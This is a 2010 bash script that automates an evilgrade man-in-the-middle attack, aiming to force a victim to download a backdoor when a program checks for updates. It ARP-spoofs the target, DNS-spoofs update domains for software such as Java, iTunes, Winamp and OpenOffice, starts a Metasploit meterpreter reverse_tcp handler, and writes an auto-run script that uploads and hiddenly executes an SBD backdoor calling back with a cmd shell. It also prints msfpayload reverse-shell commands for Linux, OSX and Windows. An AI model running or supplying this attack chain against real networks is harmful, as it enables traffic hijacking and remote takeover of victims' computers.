#!/bin/bash
# (C)opyright 2010 - g0tmi1k
# evilGrade v0.1.1 (2010-05-16)

# Settings (Change theses)
export gateway_interface=eth0
export path=~/isr-evilgrade/

# Settings (Leave theses)
export gatewayIP=`route | awk '/^default/ {getline; print $2}'`
export     ourIP=`ifconfig $gateway_interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}'`
export version="0.1.1"
trap 'cleanup' 2 #Interrupt

cleanup() {
   echo ""
   echo "[>] Cleaning up..."
   if test -e /tmp/host.dns;              then rm /tmp/host.dns; fi
   if test -e /tmp/g0tmi1kEvilGrade.rb;   then rm /tmp/g0tmi1kEvilGrade.rb; fi
   if test -e /tmp/g0tmi1k-evilgrade.exe; then rm /tmp/g0tmi1k-evilgrade.exe; fi
   echo "[>] Done! (= Have you... g0tmi1k?"
   exit
}

# Main
echo "[*] g0tmi1ks (semi)auto EvilGrade v$version"

if [ "$1" == "-h" ] || [ "$1" == "/h" ] || [ "$1" == "-?" ] || [ "$1" == "/?" ]
then
   echo "(C)opyright g0tmi1k 2010 ~ http://g0tmi1k.blogspot.com"
   echo ""
   echo "sh evilGrade.sh IPAddress"
   echo ""
   echo "This is a script to automate an attack using EvilGrade with the end goal of forcing the victim to download our backdoor when they try to update a program"
   echo "One day it will be cross platform, coded better and with many more options/settings..."
   exit
elif [ "$1" ]
then
   export targetIP=$1
   echo "[>] Target address?: $targetIP"
else
   read -p "[>] Target address?: " targetIP
fi

if [ "$targetIP" ]
then
   echo "$targetIP" | nawk -F. '{
      if ( (($1>=0) && ($1<=255)) &&
           (($2>=0) && ($2<=255)) &&
           (($3>=0) && ($3<=255)) &&
           (($4>=0) && ($4<=255)) ) {
      } else {
         print("[-] "$0 ": IP address out of range!");
         exit;
      }
   }'
else
   echo "[-] $targetIP is not a valid IP address!"
   echo "[>] Setting target IP: *everyoneone*" #NOT YET!
   export targetIP="";
fi

echo "[>] Setting up our end..."
#Stopping any current web servers
xterm -geometry 85x15+10+0 -T "[EvilGrade] v$version - Stopping current web servers" -e "/etc/init.d/apache2 stop"
#Make sure we have an IP address
if [ "$ourIP" == "" ]
then
   xterm -geometry 85x15+10+0 -T "[EvilGrade] v$version - Acquiring an IP Address" -e "dhclient $gateway_interface"
   sleep 1
   export ourIP=`ifconfig $gateway_interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}'`
fi
# Enable IP Forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward
# Host file
echo "$ourIP notepad-plus.sourceforge.net" > /tmp/host.dns
echo "$ourIP notepadplus.sourceforge.net" >> /tmp/host.dns
echo "$ourIP update.speedbit.com" >> /tmp/host.dns
echo "$ourIP itunes.com" >> /tmp/host.dns
echo "$ourIP download.linkedin.com" >> /tmp/host.dns
echo "$ourIP notepad-plus.sourceforge.net" >> /tmp/host.dns
echo "$ourIP update23.services.openoffice.org" >> /tmp/host.dns
echo "$ourIP update.services.openoffice.org" >> /tmp/host.dns
echo "$ourIP swscan.apple.com" >> /tmp/host.dns
echo "$ourIP online.speedbit.com" >> /tmp/host.dns
echo "$ourIP java.sun.com" >> /tmp/host.dns
echo "$ourIP client.winamp.com" >> /tmp/host.dns
echo "$ourIP www.winamp.com" >> /tmp/host.dns
echo "$ourIP update.winzip.com" >> /tmp/host.dns

#For metasploit
echo "#! /usr/bin/env ruby" > /tmp/g0tmi1kEvilGrade.rb
echo "# (C)opyright 2010 - g0tmi1k" >> /tmp/g0tmi1kEvilGrade.rb
echo "# g0tmi1kEvilGrade.rb v$version" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_line(\"[>] g0tmi1ks Evil Grade v$version...\")" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "session = client" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
#   echo "print_status(\"Killing any old SBD (Secure BackDoor)...\")" >> /tmp/g0tmi1kEvilGrade.rb
#   echo "session.sys.process.execute(\"cmd.exe /C taskkill /IM /F sbd.exe\", nil, {'Hidden' => true})" >> /tmp/g0tmi1kEvilGrade.rb
#   echo "" >> /tmp/g0tmi1kEvilGrade.rb
#   echo "print_status(\"Removing any old SBD (Secure BackDoor)...\")" >> /tmp/g0tmi1kEvilGrade.rb
#   echo "session.sys.process.execute(\"cmd.exe /C del /F /Q %SystemDrive%\\\sbd.exe\", nil, {'Hidden' => true})" >> /tmp/g0tmi1kEvilGrade.rb
#   echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_status(\"Uploading SBD (Secure BackDoor)...\")" >> /tmp/g0tmi1kEvilGrade.rb
echo "session.fs.file.upload_file(\"%SystemDrive%\\\sbd.exe\", \"/var/www/sbd.exe\")" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_status(\"Uploaded! \")" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "sleep(1)" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_status(\"Executing SBD...\")" >> /tmp/g0tmi1kEvilGrade.rb
echo "session.sys.process.execute(\"C:\\\sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7333 $ourIP\", nil, {'Hidden' => true})   #Had a problem with %SystemDrive%" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_status(\"Executed! \")" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "sleep(1)" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_status(\"Done! (= Have you... g0tmi1k?\")" >> /tmp/g0tmi1kEvilGrade.rb
echo "sleep(1)" >> /tmp/g0tmi1kEvilGrade.rb

echo "[>] Starting metasploit..."
xterm -geometry 75x15+530+0 -T "[EvilGrade] v$version - Metasploit" -e "/pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourIP AutoRunScript=/tmp/g0tmi1kEvilGrade.rb E"&
sleep 3

echo "[>] Starting the \"Man In The Middle\" Attack..."
xterm -geometry 85x7+0+0 -T "[EvilGrade] v$version - DNSSpoof" -e "dnsspoof -i $gateway_interface -f /tmp/host.dns" &
xterm -geometry 85x6+0+120 -T "[EvilGrade] v$version - ARPSpoof" -e "arpspoof -i $gateway_interface -t $targetIP $gatewayIP" &
sleep 2

echo "[>] Getting the backdoor (SBD) ready..."
xterm -geometry 163x11+0+225 -T "[EvilGrade] v$version - SBD" -e "sbd -l -k g0tmi1k -p 7333"&
sleep 2

echo "[>] Starting EvilGrade..."
echo "Commands:"
echo "1.) Programs: (show modules)"
echo "  config notepadplus"
echo "  config osx"
echo "  config itunes"
echo "  config sunjava"
echo "  config winzip"
echo "  config winamp"
echo "  config openoffice"
echo "  config linkedin"
echo "  config speedbit"
echo "  config dap"
echo ""
echo "2.) Payloads: (show options)"
echo "Linux"
echo "  set agent '[\"/pentest/exploits/framework3/msfpayload linux/x86/shell/reverse_tcp LHOST=$ourIP X > <%OUT%>/tmp/g0tmi1k-evilgrade.exe<%OUT%>\"]'"
echo "OSX"
echo "  set agent '[\"/pentest/exploits/framework3/msfpayload osx/x86/shell_reverse_tcp LHOST=$ourIP X > <%OUT%>/tmp/g0tmi1k-evilgrade.exe<%OUT%>\"]'"
echo "Windows"
echo "  set agent '[\"/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=$ourIP X > <%OUT%>/tmp/g0tmi1k-evilgrade.exe<%OUT%>\"]'"
echo ""
echo "3.) start"
echo ""
echo "4.) exit or \"Ctrl + C\""

cd $path
./evilgrade

cleanup